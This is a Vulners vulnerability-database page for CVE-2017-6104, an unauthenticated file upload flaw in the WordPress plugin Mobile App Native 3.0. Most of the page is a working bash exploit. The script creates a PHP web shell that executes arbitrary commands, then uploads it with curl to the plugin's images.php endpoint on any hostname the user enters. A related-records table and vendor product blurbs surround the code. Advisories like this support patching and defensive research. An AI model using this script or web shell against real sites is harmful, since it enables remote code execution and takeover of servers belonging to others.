Lucene search
K

Remote file upload vulnerability in Wordpress Plugin Mobile App Native 3.0

🗓️ 03 Mar 2017 00:00:00Reported by MYMType 
seebug
 seebug
🔗 www.seebug.org👁 28 Views

Remote file upload vulnerability in WordPress Plugin Mobile App Native 3.0. Missing authentication in images.ph

Related
Code
ReporterTitlePublishedViews
Family
0day.today
WordPress Mobile App Native 3.0 Shell Upload Vulnerability
2 Mar 201700:00
zdt
CNVD
Wordpress Plugin Mobile App Native Remote File Upload Vulnerability
3 Mar 201700:00
cnvd
CVE
CVE-2017-6104
2 Mar 201722:00
cve
Cvelist
CVE-2017-6104
2 Mar 201722:00
cvelist
Exploit DB
Multiple WordPress Plugins - Arbitrary File Upload
3 Mar 201700:00
exploitdb
exploitpack
WordPress Multiple Plugins - Arbitrary File Upload
3 Mar 201700:00
exploitpack
NVD
CVE-2017-6104
2 Mar 201722:59
nvd
Packet Storm
WordPress Mobile App Native 3.0 Shell Upload
2 Mar 201700:00
packetstorm
Packet Storm
WordPress Multiple Plugin File Upload
17 Mar 201700:00
packetstorm
Prion
Design/Logic Flaw
2 Mar 201722:59
prion
Rows per page

                                                #!/bin/bash
#Exploit for the Wordpress Plugin Mobile App Native 3.0 file upload I posted.
#CVE-2017-6104
#Larry W. Cashdollar,@_larry0
#v1.0

cat > shell.php << -EOF-
<?php
if(isset(\$_REQUEST[‘cmd’])){
        echo "<pre>";
        \$cmd = (\$_REQUEST[‘cmd’]);
        system(\$cmd);
        echo "</pre>";
} else { echo "Please supply a command cmd"; }
?>
-EOF-

red='\033[0;31m'
NC='\033[0m' # No Color

while [ true ]; do 
 echo -e ${red};
 echo -e "		Mobile App Native 3.0 File Upload PoC Redux $NC";
 echo "					3/1/2017";
 echo "			   Larry W. Cashdollar, @_larry0";
 echo
 echo "				  CVE-2017-6104";
 echo "- Advisory -";
 echo "http://www.vapid.dhs.org/advisory.php?v=178";
 echo
 echo "Ctrl ^C to exit";
 echo -n "Enter Target Hostname :";
 read target;
 echo "[+] Hostname $target";
 echo "[+] Exploiting Plugin";
 echo
 RESULT=`curl -# -F '[email protected]' "http://$target/wp-content/plugins/zen-mobile-app-native/server/images.php"`;
 echo "[==========================================================================]"
 echo $RESULT
 echo "[==========================================================================]"
done
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Mar 2017 00:00Current
9.1High risk
Vulners AI Score9.1
EPSS0.38597
28